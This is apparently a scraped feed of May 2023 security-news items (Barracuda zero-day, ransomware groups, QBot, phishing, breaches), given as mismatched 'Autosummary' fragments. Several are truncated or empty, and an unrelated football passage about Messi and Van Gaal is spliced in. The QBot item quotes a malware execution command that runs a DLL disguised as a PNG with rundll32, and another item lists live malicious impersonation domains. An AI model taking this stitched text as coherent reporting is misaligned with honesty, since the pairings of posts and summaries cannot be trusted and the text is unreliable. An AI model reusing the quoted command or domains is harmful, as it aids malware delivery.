This is not the first such macOS vulnerability reported by Microsoft researchers in recent years, with another SIP bypass dubbed Shrootless reported in 2021, allowing attackers to perform arbitrary operations on compromised Macs, escalate privileges to root, and potentially install rootkits on vulnerable devices. "Autosummary:
One of the malicious website that"s still online (BleepingComputer) Some of the malicious sites used in the said time period are: gllmp.com (offline) – Impersonates the free and open-source image editor gotomeet.us (offline) – Impersonates the cloud video meeting and conferencing app singularlabs.org (offline) – Impersonates a PC-cleaning tool chatgpt4beta.com (online) – Impersonates the AI-powered chatbot platform astrachats.com (offline) – Impersonates the secure chat software devolutionrdp.com (online) – Impersonates a remote desktop management tool cozy-sofware.com (offline) – Impersonates a remote desktop management tool vectordmanagesoft.com (offline) - Impersonates a remote desktop management tool devolrdm.com (online) - Impersonates a remote desktop management tool dirwinstat.com (online) – Impersonates a disk usage viewer and cleanup tool These fake sites are promoted through Google advertisements and highly targeted phishing emails, with most of the victims based in Eastern Europe. The current campaign Trend Micro"s report on the latest RomCom activity lists several examples of websites used by the malware operators between December 2022 and April 2023 that impersonate legitimate software, like Gimp, Go To Meeting, ChatGPT, WinDirStat, AstraChat, System Ninja, Devolutions" Remote Desktop Manager, and more. "Categories: Exploits and vulnerabilities Categories: News Barracuda Networks issued a patch for a zero-day vulnerability in its Email Security Gateway that was actively being exploited |
The post Barracuda Networks patches zero-day vulnerability in Email Security Gateway appeared first on Malwarebytes Labs.
"Autosummary:
Posted: May 30, 2023 by Barracuda Networks issued a patch for a zero-day vulnerability in its Email Security Gateway that was actively being exploited On May 20, Barracuda Networks issued a patch for a zero day vulnerability in its Email Security Gateway (ESG) appliance. "Media and entertainment (M&E) companies are rapidly turning to cloud storage in efforts to upgrade their security measures, according Wasabi. Survey findings highlighted that, while M&E organizations are still relatively new to cloud storage (69% of respondents had been using cloud storage for three years or less), public cloud storage use is on the rise, with 89% of respondents looking to increase (74%) or maintain (15%) their cloud services. Balancing budgets, security, and data loss … More
The post Top public cloud security concerns for the media and entertainment industry appeared first on Help Net Security.
"Autosummary:
The top three biggest security concerns M&E organizations have with public cloud include: Lack of native security services (42%) Lack of native backup, disaster and data protection tools and services (39%) Lack of experience with cloud platform or adequate security training (38%) “Organizations in the media and entertainment industry are flocking to cloud storage as their digital assets need to be stored securely, cost-effectively and accessed quickly,” said Whit Jackson, VP of Media and Entertainment at Wasabi. "65% of organizations in the enterprise sector suffered a cyberattack within the last 12 months, which is similar to the results among companies of all sizes (68%), according to Netwrix. Larger organizations are a more frequent target for cyberattacks The most common security incidents are also the same: phishing, ransomware and user account compromise. However, larger organizations are a more frequent target for ransomware or other malware attacks: 48% of enterprises experienced this type of … More
The post Company size doesn’t matter when it comes to cyberattacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Experts warn of phishing attacks that are combining the use of compromised Microsoft 365 accounts and .rpmsg encrypted emails. Trustwave researchers have observed threat actors using encrypted RPMSG attachments sent via compromised Microsoft 365 accounts in a phishing campaign aimed at stealing Microsoft credentials. RPMSG files are used to deliver e-mails with Rights-Managed Email Object Protocol enabled. […]
The post Attackers use encrypted RPMSG messages in Microsoft 365 targeted phishing attacks appeared first on Security Affairs.
"Autosummary:
The script uses the open source FingerprintJS library to collect recipient’s data, including visitor ID, connect token (hardcoded from the configuration), connect hash (hardcoded from the configuration), video card renderer information, system language, device memory, hardware concurrency (# of processor), browser plugins installed, browser window size, orientation, and screen resolution, and OS architecture. "Autosummary:
Full name Address Date of birth Phone number Email Social Security number Driver’s license number Government-issued ID number Health insurance (plan information, insurance company, member number, Medicaid-Medicare ID numbers) Care for teeth or braces (visits, dentist name, doctor name, past care, x-rays/photos, medicines, and treatment) Bills and insurance claims The notification filed with the Office of the Maine Attorney General says the breach impacted 8,923,662 people, including patients, parents, guardians, or guarantors. "Autosummary:
The countries with the most detections include Peru, Egypt, Thailand, Indonesia, Turkey, Brazil, Mexico, South Africa, Poland, and India. "Autosummary:
(Gartner, 21 July 2022, Implement a Continuous Threat Exposure Management (CTEM) Program) Download our new whitepaper, Establishing a Modern Exposure Management Program, and discover: Why critical vulnerability does not equal risk The different types of exposures impacting organizational security posture The key fundamentals of a modern exposure management program designed for an evolving risk landscape And more! Challenge 2 – Seeing the bird"s eye view A comprehensive CTEM program covers many different areas, from Cloud, to AD, to software vulnerabilities, to network security and basically everything else. Challenge 1 – Getting non-security and security on the same page It"s a well-known fact that IT/infrastructure/DevOps/application, etc. teams and security teams don"t always speak the same language; this is problematic in numerous ways but when implementing new programs or undertakings, this disconnect can become even more problematic. "Managed Care of North America (MCNA) Dental disclosed a data breach that impacted more than 8.9 million individuals. Managed Care of North America (MCNA) Dental suffered a data breach that impacted 8,923,662 patients. MCNA Dental is one of the largest US dental care and oral health insurance providers. The security breach exposed the personal information […]
The post Lockbit ransomware attack on MCNA Dental impacts 8.9M individuals appeared first on Security Affairs.
"Autosummary:
Stole data includes demographic information to identify and contact patients, such as full name, date of birth, address, telephone and email; Social Security number; driver’s license number or government-issued identification number; health insurance information, such as name of plan/insurer/government payor, member/Medicaid/Medicare ID number, plan and/or group number; and information regarding dental/orthodontic care. "Autosummary:
"US CISA added recently patched Barracuda zero-day vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added a recently patched Barracuda zero-day vulnerability to its Known Exploited Vulnerabilities Catalog. This week, the network security solutions provider Barracuda warned customers that some of its Email Security Gateway (ESG) appliances were recently breached […]
The post CISA adds recently patched Barracuda zero-day to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Wireless Broadband Alliance CEO on key drivers for Wi-Fi adoption in enterprise networks This Help Net Security interview with Tiago Rodrigues, CEO at Wireless Broadband Alliance (WBA), delves into the future of enterprise networking, exploring the significant role of Wi-Fi 6E and Private 5G. Navigating the quantum leap in cybersecurity In this Help Net Security interview, we sit down with … More
The post Week in review: Zyxel firewalls vulnerability, phishing campaign targets ChatGPT users appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Wireless Broadband Alliance CEO on key drivers for Wi-Fi adoption in enterprise networks This Help Net Security interview with Tiago Rodrigues, CEO at Wireless Broadband Alliance (WBA), delves into the future of enterprise networking, exploring the significant role of Wi-Fi 6E and Private 5G. Navigating the quantum leap in cybersecurity In this Help Net Security interview, we sit down with Dr. Atsushi Yamada, the newly appointed CEO of ISARA, a security solutions company specializing in creating quantum-safe cryptography. New infosec products of the week: May 26, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Axiado, Delinea, Netscout, Radware, and Veriff. "Autosummary:
Fake in-browser WinRar screen pretending to open a ZIP archive Source: BleepingComputer To make the fake WinRar window even more convincing, the researchers implemented a fake security Scan button that, when clicked, says that the files were scanned and no threats were detected.BleepingComputer When you click on that link, your browser will attempt to open the https://setup.zip site, which could redirect you to another site, show an HTML page, or prompt you to download a file. "Swiss electrification and automation technology giant ABB confirmed it has suffered a data breach after a ransomware attack. ABB has more than 105,000 employees and has $29.4 billion in revenue for 2022. On May 7, 2023, the Swiss multinational company, leading electrification and automation technology provider, suffered a cyber attack that reportedly impacted its business operations. […]
The post Industrial automation giant ABB disclosed data breach after ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ABB) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"The vulnerability would have allowed a potential attacker to trick a user into visiting a malicious link, logging in to a third-party auth provider, and inadvertently revealing their third-party auth credentials," Expo"s James Ide said. "Autosummary:
"Autosummary:
" Even the typically mild-mannered Messi took issue with a comment from Van Gaal, who had said the Argentina captain did not "participate much" when his team lost the ball. After the final whistle, the Argentina players taunted their opponents, with Martinez - who saved two penalties in the shootout that followed a 2-2 draw - shouting at Netherlands boss Louis van Gaal. "The recently identified Buhti operation targets organizations worldwide with rebranded LockBit and Babuk ransomware variants. Researchers from Symantec discovered a new ransomware operation called Buhti (aka Blacktail) that is using LockBit and Babuk variants to target Linux and Windows systems worldwide. The ransomware operation hasn’t its own ransomware payload, however, it uses a custom information […]
The post New Buhti ransomware operation uses rebranded LockBit and Babuk payloads appeared first on Security Affairs.
"Autosummary:
The information stealer used by the group is written in Golang, it allows operators to look for specific files (pdf, .php, .png, .ppt, .psd, .rar, .raw, .rtf, .sql, .svg, .swf, .tar, .txt, .wav, .wma, .wmv, .xls, .xml, .yml, .zip, .aiff, .aspx, .docx, .epub, .json, .mpeg, .pptx, .xlsx, .yaml. ) "Autosummary:
"Autosummary:
This PNG file (actually a DLL) is then executed using rundll32.exe with the following command: rundll32 c:\users\public\default.png,print QBot will now quietly run in the background, stealing emails for use in further phishing attacks and eventually downloading other payloads, such as Cobalt Strike (a post-exploitation toolkit threat actors use to gain initial access to the infected device). "The city of Augusta in Georgia, U.S., admitted that the recent IT system outage was caused by a cyber attack. While the City of Augusta revealed that a cyberattack caused the recent IT outage, the BlackByte ransomware gang has claimed responsibility for the attack. The attack took place on May 21, the administrator at the City […]
The post Is the BlackByte ransomware gang behind the City of Augusta attack? appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, City of Augusta) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "A newly identified ransomware operation has refashioned leaked LockBit and Babuk payloads into Buhti ransomware, to launch attacks on both Windows and Linux systems. Use of public exploits One notable aspect of the attackers leveraging the Buhti ransomware is their ability to quickly exploit newly disclosed vulnerabilities (e.g., the recently patched PaperCut and IBM Aspera Faspex flaws). The attackers are leveraging public exploits, Dick O’Brien, principal intelligence analyst with Symantec Threat Hunter team told Help … More
The post New Buhti ransomware uses leaked payloads and public exploits appeared first on Help Net Security.
"Autosummary:
“While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail’s general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated,” Symantec has concluded. "Perception Point’s team has identified a 356% increase in the number of advanced phishing attacks attempted by threat actors in 2022. Overall, the total number of attacks increased by 87%, highlighting the growing threat that cyber attacks now pose to organizations. Phishing attacks increase Throughout 2022, Perception Point’s team analyzed several concerning trends. Firstly, malicious actors continue to gain widespread access to new tools and advances in artificial intelligence (AI) and machine learning (ML) which … More
The post Threat actors exploit new channels for advanced phishing attacks appeared first on Help Net Security.
"Autosummary:
“As the global threat landscape continues to evolve, we are sharing vital data that portrays the meteoric rise in the number of attacks, combined with increasingly sophisticated attack techniques that are designed to breach and damage organizations,” said Yoram Salinger, CEO of Perception Point. "Cybercriminals are increasingly posing as multi-factor authentication vendors and small businesses are becoming more popular targets, according to VIPRE. Attachment-based malspam is on the rise Financial institutions (48%) are still the most targeted sector by a wide margin. Insider attacks now take on average 85 days to contain – up from 77 days the previous year. The most common phishing links are compromised websites (52%), newly registered domains (39%), and subdomain cybersquatting (9%). The report … More
The post Cybercriminals masquerading as MFA vendors appeared first on Help Net Security.
"Autosummary:
Emerging email-based threats To combat emerging email-based threats, VIPRE’s report highlights four recommendations that will enable businesses and their employees to fortify themselves against opportunistic email attacks: Cybercriminals are posing as MFA vendors. "Autosummary:
The WordPress security company said it "blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing." "Autosummary:
"The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said. "Autosummary:
The company did the right thing - it informed the police, and it assigned its own IT security staff to investigate the attack, find out how it had occurred, and mitigate any damage which had been caused. "Experts detailed a new piece of malware, named CosmicEnergy, that is linked to Russia and targets industrial control systems (ICS). Researchers from Mandiant discovered a new malware, named CosmicEnergy, designed to target operational technology (OT) / industrial control system (ICS) systems. The malicious code was first uploaded to a public malware scanning service in December 2021 by […]
The post New CosmicEnergy ICS malware threatens energy grid assets appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ICS malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Since its launch, Black Basta has been responsible for attacks targeting the American Dental Association, Sobeys, Knauf, Yellow Pages Canada, UK outsourcing company Capita, and, more recently, German defense contractor Rheinmetall. "Autosummary:
The leaked documents seen by BleepingComputer contain payroll information, contact details, personally identifiable information (PII), physical addresses, contracts, city budget allocation data, and other types of details. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @malwrhunterteam, @BleepinComputer, @serghei, @billtoulas, @fwosar, @Ionut_Ilascu, @struppigel, @LawrenceAbrams, @Seifreed, @security_score, @Unit42_Intel, @_CPResearch_, @pcrisk, @BroadcomSW, @uuallan, @Jon__DiMaggio, @AShukuhi, @BushidoToken, @BrettCallow, and @UK_Daniel_Card. "The City of Augusta, GA began experiencing technical difficulties this past Sunday, May 21, 2023, unrelated to last week"s outage, resulting in a disruption to certain computer systems," reads the City"s statement. "ESET research uncovers an Android app that initially had no harmful features but months later turned into a spying tool
The post How an innocuous app morphed into a trojan – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Autosummary:
"The widespread adoption of remote and hybrid working practices in recent years has brought numerous benefits to various industries, but has also introduced new cyber threats, particularly in the critical infrastructure sector. These threats extend not only to IT networks but also to operational technology (OT) and cyber-physical systems, which can directly influence crucial physical processes. In response to these risks, the US government reinforced critical infrastructure security by introducing Cross-Sector Cybersecurity Performance Goals (CPGs) … More
The post The essence of OT security: A proactive guide to achieving CISA’s Cybersecurity Performance Goals appeared first on Help Net Security.
"Autosummary:
CPG 1.0 Identify: Scoping out the vulnerabilities in the OT environment CISA’s first CPG is “Identify”, which includes identifying the vulnerabilities in the IT and OT assets inventory, establishing supply chain incident reporting and vulnerability disclosure program, validating the effectiveness of third-party security controls across your IT and OT networks, establishing OT security leadership, and mitigating known vulnerabilities. Addressing all these aspects of account security can be a chore for most organizations, but they can turn to unified secure remote access (SRA) solutions that can extend multiple account-level security controls to OT remote users via enforcement of multi-factor authentication (MFA), least privilege policies, and role-based access. "According to Imperva, bad bot traffic grew to 30.2%, a 2.5% increase over 2021. In this Help Net Security video, Lynn Marks, Senior Product Manager at Imperva, discusses malicious bot activity. This is a substantial threat for businesses, leading to potential consequences such as compromised accounts, stolen data, spam, increased infrastructure and support expenses, customer attrition, and diminished online services. These automated attacks targeting organizations’ websites, infrastructure, APIs, and applications each year result in billions … More
The post How smart bots are infecting and exploiting the internet appeared first on Help Net Security.
"Autosummary:
"To achieve a diverse and well-trained cybersecurity workforce, organizations recognize the value of a quality training program supported by the pursuit of cybersecurity certifications, according to Security Innovation and Ponemon Institute. The report revealed a growing embrace of realistic simulations in training programs, with respondents ranking this feature as highly effective and delivering the greatest ROI compared with other cybersecurity training program components. Positive shifts in cybersecurity training programs The report found positive shifts in … More
The post Realistic simulations are transforming cybersecurity training appeared first on Help Net Security.
"Autosummary:
Many companies have implemented accountability measures by making training requirements mandatory – 45% of companies do not allow learners to waive cybersecurity training requirements compared with only 20% in 2020 – while 53% now report results to C-level executives in their organization, up from 31% in 2020. "In March 2023, the total number of breaches reported was higher than those reported in the previous three years combined, according to Ivanti. Ransomware groups are continuously weaponizing vulnerabilities and adding them to their arsenal to mount crippling and disruptive attacks on their victims. In Q1 2023, researchers identified 12 vulnerabilities newly associated with ransomware. They have also provided an update on key metrics being tracked in relation to ransomware, offering valuable insights to enterprises … More
The post 12 vulnerabilities newly associated with ransomware appeared first on Help Net Security.
"Autosummary:
“One of the biggest challenges for IT and security teams is prioritizing and remediating vulnerabilities, particularly those tied to ransomware,” according to Srinivas Mukkamala, CPO at Ivanti. The weakness categories The report also tracks the weakness categories contributing to vulnerabilities weaponized by ransomware groups, highlighting the lack of security in software products and operating systems widely used by enterprises. "Autosummary:
"The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group"s expanding capabilities and ongoing effort in developing new tools," Check Point researchers Marc Salinas Fernandez and Jiri Vinopal said. "Iran-linked threat actor Tortoiseshell targeted shipping, logistics, and financial services companies in Israel with watering hole attacks. ClearSky Cyber Security uncovered a watering hole attack on at least eight Israeli websites belonging to shipping, logistics, and financial services companies and attributed them with low confidence to the Iran-linked APT group Tortoiseshell (aka TA456 or Imperial […]
The post Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Tortoiseshell) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Examples of the targeted entities include ActivoBank, Caixa Geral de Depósitos, CaixaBank, Citibanamex, Santander, Millennium BCP, ING, Banco BPI, and Novobanco. "Autosummary:
The tool targets the following file types for theft: pdf, php, png, ppt, psd, rar, raw, rtf, sql, svg, swf, tar, txt, wav, wma, wmv, xls, xml, yml, zip, aiff, aspx, docx, epub, json, mpeg, pptx, xlsx, and yaml. "A clever phishing campaign aimed at stealing users’ business email account credentials by impersonating OpenAI, the company behind the ChatGPT chatbot, has been spotted by Inky researchers. The attack ChatGPT has quickly gained popularity and is used widely by individuals and organizations. That’s enough of a reason for cybercriminals to impersonate the brand. The initial phase of the attack involves the victim receiving an email that appears legitimate, purportedly sent by OpenAI. The email requests … More
The post Phishing campaign targets ChatGPT users appeared first on Help Net Security.
"Autosummary:
“The redirection happens because the personal code uses a my_slice variable “window.location.replace()” to construct a new URL (…) and replace the existing malicious URL,” INKY experts explained. "A vulnerability (CVE-2023-2868) in Barracuda Networks’ Email Security Gateway (ESG) appliances has been exploited by attackers, the company has warned. About CVE-2023-2868 CVE-2023-2868 is a critical remote command injection vulnerability affecting only physical Barracuda Email Security Gateway appliances, versions 5.1.3.001 – 9.2.0.006. “The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). [It] stems from incomplete input validation of a user-supplied .tar file as it pertains to the … More
The post Barracuda email security appliances hacked via zero-day vulnerability (CVE-2023-2868) appeared first on Help Net Security.
"Autosummary:
Reddit users on the sysadmin subreddit have lamented the vagueness of the public alert and one of them shared the email sent by Barracuda’s support team, in which it advised customers to rotate any credentials connected to the ESG appliance: LDAP, AD, Barracuda Cloud Control, FTP and SMB credentials, as well as any private TLS certificates. "Autosummary:
"With the first PeepingTitle variant capturing the entire screen, and the second capturing each window a user interacts with, this malware duo provides the threat actor with a detailed insight into user activity," the researchers explained. "Autosummary:
"While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail"s general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated," Symantec said. "North Korea-linked APT group Lazarus actor has been targeting vulnerable Microsoft IIS servers to deploy malware. AhnLab Security Emergency response Center (ASEC) researchers reported that the Lazarus APT Group is targeting vulnerable versions of Microsoft IIS servers in a recent wave of malware-based attacks. Once discovered a vulnerable ISS server, the attackers leverage the DLL side-loading […]
The post North Korea-linked Lazarus APT targets Microsoft IIS servers to deploy malware appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The harvested data includes visitor ID, connect token and hash, video card renderer information, system language, device memory, hardware concurrency, installed browser plugins, browser window details, and OS architecture. "Autosummary:
The list includes but is not limited to WhisperGate/WhisperKill, FoxBlade (aka HermeticWiper), SonicVote (aka HermeticRansom), CaddyWiper, DesertBlade, Industroyer2, Lasainraw (aka IsaacWiper), and FiberLake (aka DoubleZero). "Autosummary:
However, the email tells me that my bank account has already been debited for $249.99 (that sounds like a lot, even if it is to protect two devices with not just anti-virus but also “theft protection.”) "Corvus Insurance has unveiled Corvus Signal, the risk prevention solution that brings together brokers, policyholders, and Corvus security experts in partnership. Corvus Signal has been shown to reduce cyber breach frequency and cost by up to 20 percent. The announcement comes amid increasing market activity and interest in combining cyber insurance with risk management services. Corvus Signal is the solution that demonstrates such an approach can bend the loss curve. For more than three years, … More
The post Corvus Signal provides continuous threat analysis, tailored alerts and always-on recommendations appeared first on Help Net Security.
"Autosummary:
“We found, through extensive experience working with policyholders, that a partnership-based approach combining personalized cyber threat insights and risk advisory services is the most effective way to curb cyber risk for organizations,” said Jason Rebholz, CISO at Corvus Insurance. "Autosummary:
"The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News. "Autosummary:
"Using the victim"s Exchange server for the C2 channel allows the backdoor to blend in with benign traffic, thereby ensuring that the threat actor can easily avoid nearly all network-based detections and remediations inside and outside the target organization"s infrastructure," the researchers said. "Autosummary:
"Categories: Business Tags: beautiful cookie consent banner Tags: Wordpress Tags: plugin Tags: vulnerability Tags: exploit Tags: XSS Tags: javascript Tags: update Tags: website We take a look at a vulnerability in a popular WordPress plugin. It"s been fixed, but you"ll need to update as soon as you can! |
The post "Beautiful Cookie Consent Banner" WordPress plugin vulnerability: Update now! appeared first on Malwarebytes Labs.
"Autosummary:
What’s interesting with this one, and perhaps why it’s being tagged as “bizarre”, is that the attack is misconfigured with attacks containing a “partial payload”. The plugin exploit is a cross-site scripting attack (XSS), a type of attack that injects malicious code into otherwise benign websites.Researchers have observed: 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023.The plugin, which is installed on more than 40,000 sites, has been impacted by a “bizarre campaign” being actively used since at least February 5 of this year. "Autosummary:
"In this Help Net Security interview, we sit down with Dr. Atsushi Yamada, the newly appointed CEO of ISARA, a security solutions company specializing in creating quantum-safe cryptography. With over two decades of experience in cryptography and cybersecurity, Dr. Yamada discusses his vision for ISARA and shares his insights on the critical role of post-quantum computing (PQC) in fortifying our digital landscape. Dr. Yamada, you’ve been with ISARA since 2015 and have been appointed CEO. … More
The post Navigating the quantum leap in cybersecurity appeared first on Help Net Security.
"Autosummary:
Our world-class software development kit and PKI solutions, supported by our highly experienced team of engineers and quantum experts, also allow organizations to do proof-of-concept testing of post-quantum cryptographic algorithms, to see how quantum-safe algorithms fit into their systems. The Quantum Computing Cybersecurity Preparedness Act requires federal agencies to maintain an inventory of the cryptographic assets they have in use, assess their quantum vulnerabilities, perform proof-of-concept testing of post-quantum cryptographic algorithms, and then prioritize the migration of those assets. ISARA has been a leader in the cryptographic space since the beginning, and we plan to keep doing so by evolving our product and service offerings, working in collaboration with partners, keeping our focus, and executing on our strategic vision. "ESET researchers have discovered a trojanized Android app named iRecorder – Screen Recorder. It was available on Google Play as a legitimate app in September 2021, with malicious functionality most likely added in August 2022. During its existence, the app was installed on more than 50,000 devices. Trojanized iRecorder app The malicious code that was added to the clean version of iRecorder is based on the open-source AhMyth Android RAT (remote access trojan) and has … More
The post Legitimate Android app transforms into data-snooping malware appeared first on Help Net Security.
"Autosummary:
It can also exfiltrate from the device files with extensions representing saved web pages, images, audio, video, and document files, and file formats used for compressing multiple files. "Autosummary:
"These workers deliberately obfuscate their identities, locations, and nationalities, typically using fake personas, proxy accounts, stolen identities, and falsified or forged documentation to apply for jobs at these companies. "Autosummary:
That said, Microsoft"s restrictions have led several attack groups to experiment and adapt their attack chains and payload delivery mechanisms to include uncommon file types (CHM, ISO, LNK, VHD, XLL, and WSF) and techniques like HTML smuggling. "Opti9 has been selected by Wasabi Hot Cloud Storage as a Technical Alliance Partner to offer integrated disaster recovery and artificial intelligence (AI) powered ransomware detection services. As result of this trusted partnership, Wasabi clients can now natively integrate a comprehensive disaster recovery and security monitoring that includes proactive protection of their data from ransomware attacks. Opti9 has been a leading managed hybrid cloud solutions and security services provider for over two decades. As part … More
The post Opti9 collaborates with Wasabi to provide clients with AI-powered ransomware detection appeared first on Help Net Security.
"Autosummary:
This includes suspicious changes to retention settings, job definitions, encryption, immutability, data deletion, job modifications or deletion, and many other factors. "A 28-year-old former IT employee of an Oxford-based company has been convicted of blackmailing his employer and unauthorized access to a computer with intent to commit other offences, after pleading guilty during a hearing at Reading Crown Court, England. IT employee blackmailing his own company The man was employed as an IT Security Analyst when, on February 27, 2018, the company suffered a cyber security incident that resulted in the attacker gaining unauthorized access to … More
The post IT employee piggybacked on cyberattack for personal gain appeared first on Help Net Security.
"Autosummary:
IT employee blackmailing his own company The man was employed as an IT Security Analyst when, on February 27, 2018, the company suffered a cyber security incident that resulted in the attacker gaining unauthorized access to part of the company’s computer systems. "Autosummary:
"Autosummary:
"This recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications," Cado Labs researcher Matt Muir said in a report shared with The Hacker News. "Autosummary:
Webshell in the text file (Check Point) Having deployed the webshells, the attackers proceed to use open-source tools that help in network reconnaissance using SoftPerfect Network Scanner, lateral movement, secure communication using Plink/PuTTY, credential stealing with ProcDump, and the exfiltration of data using FileZilla. "Autosummary:
"Kasten by Veeam released its new Kasten K10 V6.0 Kubernetes data protection platform. The new release includes features that will help customers scale their cloud native data protection more efficiently, better protect their applications and data against ransomware attacks, and increase accessibility by adding new cloud native integrations. Kubernetes was designed to enable greater productivity – helping enterprises scale automation to manage very large deployments found within containerized environments. Kubernetes has now garnered industry-standard status … More
The post Kasten K10 V6.0 enables organizations to create proactive ransomware protection strategies appeared first on Help Net Security.
"Autosummary:
Kasten by Veeam’s Kasten K10 v6.0 provides detection capabilities, immutable backups and instant recovery to address this, but perhaps more importantly, this release also introduces automation and efficiency capabilities to open the doors for large-scale container protection deployment – an inevitability for any company using containers seriously,” said Johnny Yu, Research Manager, Storage and Computing at IDC.Through our collaboration with Kasten by Veeam, we are providing customers with additional flexibility and choice in how they protect their Kubernetes workloads,” said Kirsten Newcomer, Director, Cloud and DevSecOps Strategy, Red Hat. "Honeywell released its operational technology (OT) cybersecurity solution, Honeywell Forge Cybersecurity+ | Cyber Insights, to assist customers in improving the availability, reliability and safety of their industrial control systems and operations. Cyber Insights is designed to integrate information from multiple OT data sources in order to provide a customer with actionable insights into their facility’s cybersecurity vulnerabilities and threats, allowing the customer to manage their compliance strategy, thereby helping reduce their overall cybersecurity risks. Companies … More
The post Honeywell launches Cyber Insights to identify cybersecurity threats in OT environments appeared first on Help Net Security.
"Autosummary:
"Appdome has released Build-to-Test which enables mobile developers to streamline the testing of cybersecurity features in mobile apps. The new capability allows Appdome-protected mobile apps to recognize when automated mobile app testing suites are in use and securely completed without interruption by a vendor, logging all security events for the developer to track and monitor. In continuous integration, continuous delivery (CI/CD) pipelines, mobile app quality assurance is done via automated testing services so the functionality … More
The post Appdome’s Build-to-Test streamlines mobile app cybersecurity testing appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456. "The US Department of the Treasury sanctioned four entities and one individual for their role in cyber operations conducted by North Korea. The US Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced sanctions against four entities and one individual for their role in malicious cyber operations conducted to support the government of […]
The post The US government sanctioned four entities and one individual for supporting cyber operations conducted by North Korea appeared first on Security Affairs.
"Autosummary:
“These workers deliberately obfuscate their identities, locations, and nationalities, typically using fake personas, proxy accounts, stolen identities, and falsified or forged documentation to apply for jobs at these companies.“Applications and software developed by DPRK IT workers span a range of fields and sectors, including business, health and fitness, social networking, sports, entertainment, and lifestyle.” "Autosummary:
"Autosummary:
"Barracuda warned customers that some of its Email Security Gateway (ESG) appliances were breached exploiting a zero-day vulnerability. Network security solutions provider Barracuda warned customers that some of its Email Security Gateway (ESG) appliances were recently breached by threat actors exploiting a now-patched zero-day vulnerability. The vulnerability, tracked as CVE-2023-2868, resides in the module for […]
The post Barracuda Email Security Gateway (ESG) hacked via zero-day bug appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ESG) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Categories: News Categories: Ransomware Tags: Rheinmetall Tags: BlackBasta Tags: ransomware A cyberattack on arms manufacturer Rheinmetall has been claimed by the BlackBasta ransomware group on its leak site. |
The post Rheinmetall attacked by BlackBasta ransomware appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.After the data is copied, the ransomware encrypts files and gives them the ".basta" extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. Monthly ransomware attacks in Germany with LockBit and Black Basta highlighted, April 2022 - March 2023 BlackBasta is not very different from other ransomware groups in the way it operates. "Categories: Business How Malwarebytes MDR successfully helped a company detect and respond to the potent banking Trojan QBot. |
